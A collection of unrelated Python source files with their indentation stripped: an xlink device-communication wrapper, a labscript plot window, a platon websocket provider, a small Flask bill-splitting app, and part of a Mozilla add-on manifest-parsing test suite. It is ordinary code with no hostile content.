config = load_config(args.config_file)
aci_collector = AciCollector(config)
hup = getattr(signal, 'SIGHUP', None)
if hup is not None:
sighup_handler = get_sighup_handler(aci_collector, args.config_file)
signal.signal(hup, sighup_handler)
start_http_server(aci_collector, args.web_listen_port, args.web_listen_address, args)
while True:
time.sleep(9001)
if __name__ == '__main__':
main()
|
xlink_wrapper.py
|
"""
Allows API of xlink driver C library to be called in Python.
Copyright (C) 2019-2022 Intel Corporation
SPDX-License-Identifier: Apache-2.0
"""
import logging
import threading
import os
from typing import Callable, Optional
from ctypes import *
import time
from inbm_vision_lib.constants import XLINK_LIB_PATH, MAXIMUM_STORE_FILE_SIZE, XLINK_DATA_SIZE, \
XLINK_FILE_TRANSFER_RATE, NODE_BUFFER_TIMEOUT, VISION_BUFFER_TIMEOUT
from threading import Lock
from ..constants import VISION
from .ixlink_wrapper import IXlinkWrapper
from .ixlink_wrapper import HOST_DEVICE, PCIE, X_LINK_SUCCESS
from .ixlink_wrapper import xlink_global_handle, xlink_handle
logger = logging.getLogger(__name__)
class XlinkWrapper(IXlinkWrapper):
"""Wrapper class to use xlink shared library
@param receive_callback: Callback for receiving messages over xlink
@param channel_id: Channel used for xlink communication
@param pcie_num: PCIE number used in connection
@param is_boot_dev: true if xlink boot device API to be called
"""
def __init__(self, receive_callback: Callable, channel_id: int, pcie_num: int, is_boot_dev: bool,
async_cb: Optional[Callable] = None):
super().__init__(XLINK_LIB_PATH,
receive_callback,
channel_id,
xlink_global_handle(prof_cfg=PCIE),
XLINK_DATA_SIZE,
xlink_handle(dev_type=HOST_DEVICE),
pcie_num,
async_cb)
self._xlink_handler.sw_device_id = self._xlink_pcie_num
self._is_boot_dev = is_boot_dev
self._open_channel_lock = Lock()
self._read_data_lock = Lock()
self._write_lock = Lock()
self.init_thread = threading.Thread(target=self._init_channel)
self.init_thread.start()
self._listen_thread = threading.Thread(target=self._listen_to_channel)
self._listen_thread.daemon = True
def _init_channel(self):
"""Initialize Xlink handler, connect the handler and open channel"""
logger.debug(f'{self._agent} start Xlink initialization.')
self.xlink_init_status_success = False
while self._running:
status = self._xlink_library.xlink_initialize()
if status is X_LINK_SUCCESS:
break
time.sleep(1)
logger.debug(f"PCIE Number: {self._xlink_pcie_num}")
if self._is_boot_dev:
self.boot_device()
xlink_handler_p = byref(self._xlink_handler)
logger.debug('xlink_connect start connecting... Waiting the connection...')
while self._running:
status = self._xlink_library.xlink_connect(xlink_handler_p)
if status is X_LINK_SUCCESS:
logger.debug('xlink_connect pass.')
logger.debug('xlink_open_channel. Channel ID - ' + str(self._channel_id.value))
break
logger.debug('xlink_connect start connecting... Waiting the connection...')
time.sleep(1)
if self._async_cb:
self._register_async_callback()
while self._running:
if self._open_channel_lock.acquire():
timeout = VISION_BUFFER_TIMEOUT if self._agent == VISION else NODE_BUFFER_TIMEOUT
try:
status = self._xlink_library.xlink_open_channel(xlink_handler_p, self._channel_id,
self._operation_type,
self._data_size, timeout * 1000)
finally:
self._open_channel_lock.release()
if status is X_LINK_SUCCESS:
logger.debug('xlink_open_channel pass. Channel ID - ' +
str(self._channel_id.value))
# Wait 5 seconds for xlink to stabilize
time.sleep(5)
self.xlink_init_status_success = True
logger.info('Xlink initialization complete.')
break
else:
pass
time.sleep(1)
def get_xlink_device_status(self) -> int:
""" Check the xlink device status.
XLINK_DEV_OFF = 0, // device is off
XLINK_DEV_ERROR, // device is busy and not available
XLINK_DEV_BUSY, // device is available for use
XLINK_DEV_RECOVERY, // device is in recovery mode
XLINK_DEV_READY // device HW failure is detected
@return: status of xlink device
"""
device_status = c_int(0)
# logger.debug('Call xlink get device status for {0}'.format(
# str(self._xlink_handler.sw_device_id)))
if self._running:
status = self._xlink_library.xlink_get_device_status(
byref(self._xlink_handler), byref(device_status))
if status is not X_LINK_SUCCESS:
logger.error('xlink_get device status failed - %s', str(status))
device_status = c_int(-1)
else:
logger.debug('Closing xlink in progress. Will not disrupt it.')
device_status.value = 4
logger.debug('xlink device status for {} is {}'.format(
str(self._xlink_handler.sw_device_id), str(device_status.value)))
return device_status.value
def boot_device(self) -> None:
""" Call xlink API to boot the device.
Only IA vision-agentboot the device. Not support boot VPU FW from node in current stage.
"""
super().boot_device()
def reset_device(self) -> None:
"""Call xlink API to reset the device"""
super().reset_device()
def _register_callback(self) -> None:
"""Register dummy callback to the xlink"""
dummy_callback = c_void_p()
status = self._xlink_library.xlink_data_available_event(byref(self._xlink_handler), self._channel_id,
dummy_callback)
if status is not X_LINK_SUCCESS:
logger.error('Xlink Data Event Failed - %s', str(status))
status = self._xlink_library.xlink_data_consumed_event(byref(self._xlink_handler), self._channel_id,
dummy_callback)
if status is not X_LINK_SUCCESS:
logger.error('Xlink Data Event Failed - %s', str(status))
logger.debug("xlink callback registered.")
def _listen_to_channel(self):
"""Listen the channel and waiting for incoming message"""
s_buffer = create_string_buffer(self._data_size)
message = POINTER(c_char)(s_buffer) # type: ignore
# Waiting xlink initialization complete
while self._running and not self.xlink_init_status_success:
time.sleep(1)
while self._running:
size = c_uint32(0)
while self._running and size.value == 0 and self._read_data_lock.acquire():
try:
self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id, byref(message),
byref(size))
time.sleep(0.1)
finally:
self._read_data_lock.release()
if size.value != 0:
logger.info('Received message size ' + str(size.value) + '. Message is:')
message_combined = ''
for i in range(size.value):
message_combined = message_combined + \
message[i].decode('utf-8') # type: ignore
if i == (int(size.value) - 1):
logger.info('%s', str(message_combined))
self._xlink_release_data()
if self._receive_callback is not None:
logger.info('Receive callback method exist. Call the method.')
# Use threading to speed up message handling so that it can speed up xlink_read_data
# process.
handle_thread = threading.Thread(target=self._receive_callback, args=(message_combined,))
handle_thread.daemon = True
handle_thread.start()
def receive_file(self, file_save_path: str) -> str:
"""Receive update file and save it to the local repository.
@param file_save_path: local path to save the update file
@return : (str) received file name
"""
super()._check_directory(file_save_path)
logger.debug("Switch to receive file mode.")
s_buffer = create_string_buffer(self._data_size)
message = POINTER(c_char)(s_buffer) # type: ignore
size = c_uint32(0)
# Receive file name
while size.value == 0:
self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id, byref(message),
byref(size))
file_name = ""
for i in range(size.value):
file_name = file_name + message[i].decode('utf-8') # type: ignore
self._xlink_release_data()
file_path = os.path.join(file_save_path, file_name)
# Receive number of chunk
size = c_uint32(0)
while size.value == 0:
self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id, byref(message),
byref(size))
chunk_message = ""
for i in range(size.value):
chunk_message = chunk_message + message[i].decode('utf-8') # type: ignore
num_of_chunk = int(chunk_message)
self._xlink_release_data()
# Receive update file
logger.info("Receiving file. Please wait......")
# Reset size for receiving file
with open(file_path, 'wb') as update_file:
if num_of_chunk > 1:
file_collect = b''
for num in range(num_of_chunk):
logger.info("{}/{}".format(num, num_of_chunk - 1))
size = c_uint32(0)
while size.value == 0:
status = self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id,
byref(message),
byref(size))
file_collect = file_collect + message[:size.value] # type: ignore
# Write to file if file stored in memory larger than the limit or it is the last chunk of file.
if len(file_collect) > MAXIMUM_STORE_FILE_SIZE or num == (num_of_chunk - 1):
logger.debug("write to file")
update_file.write(file_collect) # type: ignore
update_file.flush()
file_collect = b''
if num != (num_of_chunk - 1):
self._xlink_release_data()
else:
size = c_uint32(0)
while size.value == 0:
status = self._xlink_library.xlink_read_data(byref(self._xlink_handler), self._channel_id,
byref(message),
byref(size))
for i in range(size.value):
# Temporary disable the progress bar as it causes slowness in simics.
# progress = receive_file_progress(i, int(size.value))
# if progress:
# logger.info("Receiving file size " + str(progress) + "%")
update_file.write(message[i]) # type: ignore
self._xlink_release_data()
logger.info("Receiving file size 100%.")
logger.info("Receive file complete. File size: %i", os.path.getsize(file_path))
logger.info("File stored at: %s", file_path)
return file_name
def get_init_status(self) -> bool:
""" Get the initialization status
@return: boolean representing initialization status
"""
return self.xlink_init_status_success
def start(self) -> None:
"""start to listen the receive channel"""
self._listen_thread.start()
def send(self, message) -> None:
"""Send the message through xlink write data API
@param message: message to be sent
"""
# Waiting xlink initialization complete
while self._running and not self.get_init_status():
time.sleep(1)
if self.get_init_status() and self._running:
logger.debug('Sending message: ' + str(message))
while self._running and self._write_lock.acquire():
try:
status = self._xlink_library.xlink_write_data(byref(self._xlink_handler), self._channel_id,
message.encode('utf8'),
len(message.encode('utf8')))
super()._check_status(status, 'XLinkWriteData data failed.')
finally:
self._write_lock.release()
break
else:
logger.info('Stop XLinkWriteData')
def receive(self, message: str) -> None:
"""Receive message"""
pass
def send_file(self, file_path: str) -> None:
# inherit docstring from superclass
while self._running and self._write_lock.acquire():
try:
super().write_file_via_unsecured(file_path)
finally:
self._write_lock.release()
break
def stop(self, disconnect: bool = False) -> None:
# inherit docstring from superclass
logger.debug('Stopping Xlink.')
self._running = False
while not self._open_channel_lock.acquire():
time.sleep(0.1)
logger.debug('Open channel lock get.')
while not self._read_data_lock.acquire():
time.sleep(0.01)
logger.debug('read_data lock get.')
time.sleep(1)
logger.debug('Close Xlink channel ID - ' + str(self._channel_id.value))
self._xlink_library.xlink_close_channel(byref(self._xlink_handler), self._channel_id)
if disconnect:
# Wait 0.5s to let xlink fully close the channel before disconnecting it.
time.sleep(0.5)
logger.debug('Disconnect Xlink')
self._xlink_library.xlink_disconnect(byref(self._xlink_handler))
|
InputPlotWindow.py
|
from __future__ import division, unicode_literals, print_function, absolute_import
from zprocess import Process
import pyqtgraph as pg
import numpy as np
from qtutils import inmain_decorator
import qtutils.qt.QtGui as QtGui
import zmq
from labscript_utils.labconfig import LabConfig
import threading
from labscript_utils import PY2
if PY2:
memoryview = buffer
# maximum amount of datapoints to be plotted at once
MAX_DATA = 1000
class PlotWindow(Process):
def run(self, connection_name, hardware_name, device_name):
self._connection_name = connection_name
self._hardware_name = hardware_name
self._device_name = device_name
self.data = np.array([], dtype=np.float64)
if self._connection_name != '-':
title = "{} ({})".format(self._hardware_name, self._connection_name)
else:
title = "{}".format(self._hardware_name)
self.plot_win = pg.plot([], title=title)
broker_pub_port = int(LabConfig().get('ports', 'BLACS_Broker_Pub'))
context = zmq.Context()
self.socket = context.socket(zmq.SUB)
self.socket.connect("tcp://127.0.0.1:%d" % broker_pub_port)
self.socket.setsockopt(zmq.SUBSCRIBE, "{} {}\0".format(self._device_name, self._hardware_name).encode('utf-8'))
self.analog_in_thread = threading.Thread(target=self._analog_read_loop)
self.analog_in_thread.daemon = True
self.analog_in_thread.start()
self.cmd_thread = threading.Thread(target=self._cmd_loop)
self.cmd_thread.daemon = True
self.cmd_thread.start()
QtGui.QApplication.instance().exec_()
self.to_parent.put("closed")
def _analog_read_loop(self):
while True:
devicename_and_channel, data = self.socket.recv_multipart()
self.update_plot(np.frombuffer(memoryview(data), dtype=np.float64))
def _cmd_loop(self):
while True:
cmd = self.from_parent.get()
if cmd == 'focus':
self.setTopLevelWindow()
@inmain_decorator(False)
def setTopLevelWindow(self):
self.plot_win.win.activateWindow()
self.plot_win.win.raise_()
@inmain_decorator(False)
def update_plot(self, new_data):
if self.data.size < MAX_DATA:
if new_data.size + self.data.size <= MAX_DATA:
self.data = np.append(self.data, new_data)
else:
if new_data.size < MAX_DATA:
self.data = np.roll(self.data, -new_data.size)
self.data[self.data.size - new_data.size:self.data.size] = new_data
else:
self.data = new_data[new_data.size - MAX_DATA:new_data.size]
else:
if new_data.size <= self.data.size:
self.data = np.roll(self.data, -new_data.size)
self.data[self.data.size - new_data.size:self.data.size] = new_data
else:
self.data = new_data[new_data.size - self.data.size:new_data.size]
self.plot_win.plot(self.data, clear=True)
|
websocket.py
|
import asyncio
import json
import logging
import os
from threading import (
Thread,
)
from types import (
TracebackType,
)
from typing import (
Any,
Optional,
Type,
Union,
)
from platon_typing import (
URI,
)
from websockets.client import (
connect,
)
from websockets.legacy.client import (
WebSocketClientProtocol,
)
from platon.exceptions import (
ValidationError,
)
from platon.providers.base import (
JSONBaseProvider,
)
from platon.types import (
RPCEndpoint,
RPCResponse,
)
RESTRICTED_WEBSOCKET_KWARGS = {'uri', 'loop'}
DEFAULT_WEBSOCKET_TIMEOUT = 10
def _start_event_loop(loop: asyncio.AbstractEventLoop) -> None:
asyncio.set_event_loop(loop)
loop.run_forever()
loop.close()
def _get_threaded_loop() -> asyncio.AbstractEventLoop:
new_loop = asyncio.new_event_loop()
thread_loop = Thread(target=_start_event_loop, args=(new_loop,), daemon=True)
thread_loop.start()
return new_loop
def get_default_endpoint() -> URI:
return URI(os.environ.get('WEB3_WS_PROVIDER_URI', 'ws://127.0.0.1:8546'))
class PersistentWebSocket:
def __init__(
self, endpoint_uri: URI, loop: asyncio.AbstractEventLoop, websocket_kwargs: Any
) -> None:
self.ws: WebSocketClientProtocol = None
self.endpoint_uri = endpoint_uri
self.loop = loop
self.websocket_kwargs = websocket_kwargs
async def __aenter__(self) -> WebSocketClientProtocol:
if self.ws is None:
self.ws = await connect(
uri=self.endpoint_uri, loop=self.loop, **self.websocket_kwargs
)
return self.ws
async def __aexit__(
self, exc_type: Type[BaseException], exc_val: BaseException, exc_tb: TracebackType
) -> None:
if exc_val is not None:
try:
await self.ws.close()
except Exception:
pass
self.ws = None
class WebsocketProvider(JSONBaseProvider):
logger = logging.getLogger("platon.providers.WebsocketProvider")
_loop = None
def __init__(
self,
endpoint_uri: Optional[Union[URI, str]] = None,
websocket_kwargs: Optional[Any] = None,
websocket_timeout: int = DEFAULT_WEBSOCKET_TIMEOUT,
) -> None:
self.endpoint_uri = URI(endpoint_uri)
self.websocket_timeout = websocket_timeout
if self.endpoint_uri is None:
self.endpoint_uri = get_default_endpoint()
if WebsocketProvider._loop is None:
WebsocketProvider._loop = _get_threaded_loop()
if websocket_kwargs is None:
websocket_kwargs = {}
else:
found_restricted_keys = set(websocket_kwargs.keys()).intersection(
RESTRICTED_WEBSOCKET_KWARGS
)
if found_restricted_keys:
raise ValidationError(
'{0} are not allowed in websocket_kwargs, '
'found: {1}'.format(RESTRICTED_WEBSOCKET_KWARGS, found_restricted_keys)
)
self.conn = PersistentWebSocket(
self.endpoint_uri, WebsocketProvider._loop, websocket_kwargs
)
super().__init__()
def __str__(self) -> str:
return "WS connection {0}".format(self.endpoint_uri)
async def coro_make_request(self, request_data: bytes) -> RPCResponse:
async with self.conn as conn:
await asyncio.wait_for(
conn.send(request_data),
timeout=self.websocket_timeout
)
return json.loads(
await asyncio.wait_for(
conn.recv(),
timeout=self.websocket_timeout
)
)
def make_request(self, method: RPCEndpoint, params: Any) -> RPCResponse:
self.logger.debug("Making request WebSocket. URI: %s, "
"Method: %s", self.endpoint_uri, method)
request_data = self.encode_rpc_request(method, params)
future = asyncio.run_coroutine_threadsafe(
self.coro_make_request(request_data),
WebsocketProvider._loop
)
return future.result()
|
app.py
|
from flask import Flask, request, render_template, abort, redirect, url_for
import asyncio, random, threading
app = Flask(__name__)
sessions = {}
clear_loop = asyncio.new_event_loop()
def thread_clear():
asyncio.set_event_loop(clear_loop)
clear_loop.run_forever()
def clear_session(id):
del sessions[id]
clear_thread = threading.Thread(target=thread_clear)
clear_thread.start()
@app.route('/', methods=['GET'])
def index():
return render_template('index.html')
@app.route('/create', methods=['GET'])
def create():
return render_template('create.html')
@app.route('/', methods=['POST'])
def store():
try:
total = float(request.form['total'])
tax = float(request.form['tax'])
tips = float(request.form['tips'])
except:
abort(400)
while True:
id = random.randint(1000, 9999)
if id not in sessions:
break
sessions[id] = {'id': id, 'total': total, 'tax': tax, 'tips': tips}
clear_loop.call_soon_threadsafe(clear_loop.call_later, 600, clear_session, id)
return redirect(url_for('show', id=id))
@app.route('/<int:id>', methods=['GET'])
def show(id):
if id in sessions:
return render_template('show.html', **sessions[id])
abort(404)
@app.errorhandler(404)
def page_not_found(error):
return render_template('404.html'), 404
if __name__ == '__main__':
app.run()
|
test_utils.py
|
# -*- coding: utf-8 -*-
import json
import os
import shutil
import tempfile
import time
import zipfile
import multiprocessing
import contextlib
from unittest import mock
from django import forms
from django.conf import settings
from django.forms import ValidationError
from django.test.utils import override_settings
import lxml
import pytest
from defusedxml.common import EntitiesForbidden, NotSupportedError
from waffle.testutils import override_switch
from olympia import amo
from olympia.amo.tests import TestCase, user_factory
from olympia.amo.tests.test_helpers import get_addon_file
from olympia.applications.models import AppVersion
from olympia.files import utils
pytestmark = pytest.mark.django_db
def _touch(fname):
open(fname, 'a').close()
os.utime(fname, None)
class AppVersionsMixin(object):
@classmethod
def setUpTestData(cls):
cls.create_webext_default_versions()
@classmethod
def create_appversion(cls, name, version):
return AppVersion.objects.create(application=amo.APPS[name].id,
version=version)
@classmethod
def create_webext_default_versions(cls):
cls.create_appversion('firefox', '36.0') # Incompatible with webexts.
cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MIN_VERSION)
cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MAX_VERSION)
cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MIN_VERSION_NO_ID)
cls.create_appversion(
'android', amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID)
cls.create_appversion(
'android', amo.DEFAULT_WEBEXT_MAX_VERSION)
cls.create_appversion(
'firefox', amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
cls.create_appversion(
'android', amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
class TestExtractor(AppVersionsMixin, TestCase):
def test_no_manifest(self):
fake_zip = utils.make_xpi({'dummy': 'dummy'})
with self.assertRaises(utils.NoManifestFound) as exc:
utils.Extractor.parse(fake_zip)
assert isinstance(exc.exception, forms.ValidationError)
assert exc.exception.message == (
'No install.rdf or manifest.json found')
@mock.patch('olympia.files.utils.ManifestJSONExtractor')
@mock.patch('olympia.files.utils.RDFExtractor')
def test_parse_install_rdf(self, rdf_extractor, manifest_json_extractor):
fake_zip = utils.make_xpi({'install.rdf': ''})
utils.Extractor.parse(fake_zip)
assert rdf_extractor.called
assert not manifest_json_extractor.called
@mock.patch('olympia.files.utils.ManifestJSONExtractor')
@mock.patch('olympia.files.utils.RDFExtractor')
def test_ignore_package_json(self, rdf_extractor, manifest_json_extractor):
# Previously we preferred `package.json` to `install.rdf` which
# we don't anymore since
# https://github.com/mozilla/addons-server/issues/2460
fake_zip = utils.make_xpi({'install.rdf': '', 'package.json': ''})
utils.Extractor.parse(fake_zip)
assert rdf_extractor.called
assert not manifest_json_extractor.called
@mock.patch('olympia.files.utils.ManifestJSONExtractor')
@mock.patch('olympia.files.utils.RDFExtractor')
def test_parse_manifest_json(self, rdf_extractor, manifest_json_extractor):
fake_zip = utils.make_xpi({'manifest.json': ''})
utils.Extractor.parse(fake_zip)
assert not rdf_extractor.called
assert manifest_json_extractor.called
@mock.patch('olympia.files.utils.ManifestJSONExtractor')
@mock.patch('olympia.files.utils.RDFExtractor')
def test_prefers_manifest_to_install_rdf(self, rdf_extractor,
manifest_json_extractor):
fake_zip = utils.make_xpi({'install.rdf': '', 'manifest.json': ''})
utils.Extractor.parse(fake_zip)
assert not rdf_extractor.called
assert manifest_json_extractor.called
@mock.patch('olympia.files.utils.os.path.getsize')
def test_static_theme_max_size(self, getsize_mock):
getsize_mock.return_value = settings.MAX_STATICTHEME_SIZE
manifest = utils.ManifestJSONExtractor(
'/fake_path', '{"theme": {}}').parse()
# Calling to check it doesn't raise.
assert utils.check_xpi_info(manifest, xpi_file=mock.Mock())
# Increase the size though and it should raise an error.
getsize_mock.return_value = settings.MAX_STATICTHEME_SIZE + 1
with pytest.raises(forms.ValidationError) as exc:
utils.check_xpi_info(manifest, xpi_file=mock.Mock())
assert (
exc.value.message ==
u'Maximum size for WebExtension themes is 7.0 MB.')
# dpuble check only static themes are limited
manifest = utils.ManifestJSONExtractor(
'/fake_path', '{}').parse()
assert utils.check_xpi_info(manifest, xpi_file=mock.Mock())
class TestRDFExtractor(TestCase):
def setUp(self):
self.firefox_versions = [
AppVersion.objects.create(application=amo.APPS['firefox'].id,
version='38.0a1'),
AppVersion.objects.create(application=amo.APPS['firefox'].id,
version='43.0'),
]
self.thunderbird_versions = [
AppVersion.objects.create(application=amo.APPS['android'].id,
version='42.0'),
AppVersion.objects.create(application=amo.APPS['android'].id,
version='45.0'),
]
def test_apps_disallow_thunderbird_and_seamonkey(self):
zip_file = utils.SafeZip(get_addon_file(
'valid_firefox_and_thunderbird_addon.xpi'))
extracted = utils.RDFExtractor(zip_file).parse()
apps = extracted['apps']
assert len(apps) == 1
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '38.0a1'
assert apps[0].max.version == '43.0'
class TestManifestJSONExtractor(AppVersionsMixin, TestCase):
def parse(self, base_data):
return utils.ManifestJSONExtractor(
'/fake_path', json.dumps(base_data)).parse()
def test_instanciate_without_data(self):
"""Without data, we load the data from the file path."""
data = {'id': 'some-id'}
fake_zip = utils.make_xpi({'manifest.json': json.dumps(data)})
extractor = utils.ManifestJSONExtractor(zipfile.ZipFile(fake_zip))
assert extractor.data == data
def test_guid_from_applications(self):
"""Use applications>gecko>id for the guid."""
assert self.parse(
{'applications': {
'gecko': {
'id': 'some-id'}}})['guid'] == 'some-id'
def test_guid_from_browser_specific_settings(self):
"""Use applications>gecko>id for the guid."""
assert self.parse(
{'browser_specific_settings': {
'gecko': {
'id': 'some-id'}}})['guid'] == 'some-id'
def test_name_for_guid_if_no_id(self):
"""Don't use the name for the guid if there is no id."""
assert self.parse({'name': 'addon-name'})['guid'] is None
def test_type(self):
"""manifest.json addons are always ADDON_EXTENSION."""
assert self.parse({})['type'] == amo.ADDON_EXTENSION
def test_is_restart_required(self):
"""manifest.json addons never requires restart."""
assert self.parse({})['is_restart_required'] is False
def test_name(self):
"""Use name for the name."""
assert self.parse({'name': 'addon-name'})['name'] == 'addon-name'
def test_version(self):
"""Use version for the version."""
assert self.parse({'version': '23.0.1'})['version'] == '23.0.1'
def test_homepage(self):
"""Use homepage_url for the homepage."""
assert (
self.parse({'homepage_url': 'http://my-addon.org'})['homepage'] ==
'http://my-addon.org')
def test_summary(self):
"""Use description for the summary."""
assert (
self.parse({'description': 'An addon.'})['summary'] == 'An addon.')
def test_invalid_strict_min_version(self):
data = {
'applications': {
'gecko': {
'strict_min_version': 'A',
'id': '@invalid_strict_min_version'
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert (
exc.value.message ==
'Lowest supported "strict_min_version" is 42.0.')
def test_unknown_strict_min_version(self):
data = {
'applications': {
'gecko': {
'strict_min_version': '76.0',
'id': '@unknown_strict_min_version'
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert exc.value.message == (
u'Unknown "strict_min_version" 76.0 for Firefox')
def test_unknown_strict_max_version(self):
data = {
'applications': {
'gecko': {
'strict_max_version': '76.0',
'id': '@unknown_strict_min_version'
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_strict_min_version_needs_to_be_higher_then_42_if_specified(self):
"""strict_min_version needs to be higher than 42.0 if specified."""
data = {
'applications': {
'gecko': {
'strict_min_version': '36.0',
'id': '@too_old_strict_min_version'
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert (
exc.value.message ==
'Lowest supported "strict_min_version" is 42.0.')
def test_apps_use_provided_versions(self):
"""Use the min and max versions if provided."""
firefox_min_version = self.create_appversion('firefox', '47.0')
firefox_max_version = self.create_appversion('firefox', '47.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=47.0',
'strict_max_version': '=47.*',
'id': '@random'
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min == firefox_min_version
assert app.max == firefox_max_version
# We have no way of specifying a different version for Android when an
# explicit version number is provided... That being said, we know that
# 47.0 is too low for Android, so we silently cap it at 48.0. That
# forces us to also change the max version for android.
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
assert app.max.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
def test_apps_use_default_versions_if_none_provided(self):
"""Use the default min and max versions if none provided."""
data = {'applications': {'gecko': {'id': 'some-id'}}}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
# But if 'browser_specific_settings' is used, it's higher min version.
data = {'browser_specific_settings': {'gecko': {'id': 'some-id'}}}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min.version == (
amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == (
amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_is_webextension(self):
assert self.parse({})['is_webextension']
def test_allow_static_theme_waffle(self):
manifest = utils.ManifestJSONExtractor(
'/fake_path', '{"theme": {}}').parse()
utils.check_xpi_info(manifest)
assert self.parse({'theme': {}})['type'] == amo.ADDON_STATICTHEME
def test_extensions_dont_have_strict_compatibility(self):
assert self.parse({})['strict_compatibility'] is False
def test_moz_signed_extension_no_strict_compat(self):
addon = amo.tests.addon_factory()
user = amo.tests.user_factory(email='foo@mozilla.com')
file_obj = addon.current_version.all_files[0]
file_obj.update(is_mozilla_signed_extension=True)
fixture = (
'src/olympia/files/fixtures/files/'
'legacy-addon-already-signed-0.1.0.xpi')
with amo.tests.copy_file(fixture, file_obj.file_path):
parsed = utils.parse_xpi(file_obj.file_path, user=user)
assert parsed['is_mozilla_signed_extension']
assert not parsed['strict_compatibility']
def test_moz_signed_extension_reuse_strict_compat(self):
addon = amo.tests.addon_factory()
user = amo.tests.user_factory(email='foo@mozilla.com')
file_obj = addon.current_version.all_files[0]
file_obj.update(is_mozilla_signed_extension=True)
fixture = (
'src/olympia/files/fixtures/files/'
'legacy-addon-already-signed-strict-compat-0.1.0.xpi')
with amo.tests.copy_file(fixture, file_obj.file_path):
parsed = utils.parse_xpi(file_obj.file_path, user=user)
assert parsed['is_mozilla_signed_extension']
# We set `strictCompatibility` in install.rdf
assert parsed['strict_compatibility']
@mock.patch('olympia.addons.models.resolve_i18n_message')
def test_mozilla_trademark_disallowed(self, resolve_message):
resolve_message.return_value = 'Notify Mozilla'
addon = amo.tests.addon_factory()
file_obj = addon.current_version.all_files[0]
fixture = (
'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi')
with amo.tests.copy_file(fixture, file_obj.file_path):
with pytest.raises(forms.ValidationError) as exc:
utils.parse_xpi(file_obj.file_path)
assert dict(exc.value.messages)['en-us'].startswith(
u'Add-on names cannot contain the Mozilla or'
)
@mock.patch('olympia.addons.models.resolve_i18n_message')
@override_switch('content-optimization', active=False)
def test_mozilla_trademark_for_prefix_allowed(self, resolve_message):
resolve_message.return_value = 'Notify for Mozilla'
addon = amo.tests.addon_factory()
file_obj = addon.current_version.all_files[0]
fixture = (
'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi')
with amo.tests.copy_file(fixture, file_obj.file_path):
utils.parse_xpi(file_obj.file_path)
def test_apps_use_default_versions_if_applications_is_omitted(self):
"""
WebExtensions are allowed to omit `applications[/gecko]` and we
previously skipped defaulting to any `AppVersion` once this is not
defined. That resulted in none of our plattforms being selectable.
See https://github.com/mozilla/addons-server/issues/2586 and
probably many others.
"""
data = {}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_NO_ID
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_handle_utf_bom(self):
manifest = b'\xef\xbb\xbf{"manifest_version": 2, "name": "..."}'
parsed = utils.ManifestJSONExtractor(None, manifest).parse()
assert parsed['name'] == '...'
def test_raise_error_if_no_optional_id_support(self):
"""
We only support optional ids in Firefox 48+ and will throw an error
otherwise.
"""
data = {
'applications': {
'gecko': {
'strict_min_version': '42.0',
'strict_max_version': '49.0',
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)['apps']
assert (
exc.value.message ==
'Add-on ID is required for Firefox 47 and below.')
def test_comments_are_allowed(self):
json_string = """
{
// Required
"manifest_version": 2,
"name": "My Extension",
"version": "versionString",
// Recommended
"default_locale": "en",
"description": "A plain text description"
}
"""
manifest = utils.ManifestJSONExtractor(
'/fake_path', json_string).parse()
assert manifest['is_webextension'] is True
assert manifest.get('name') == 'My Extension'
def test_dont_skip_apps_because_of_strict_version_incompatibility(self):
# We shouldn't skip adding specific apps to the WebExtension
# no matter any potential incompatibility, e.g
# browser_specific_settings is only supported from Firefox 48.0
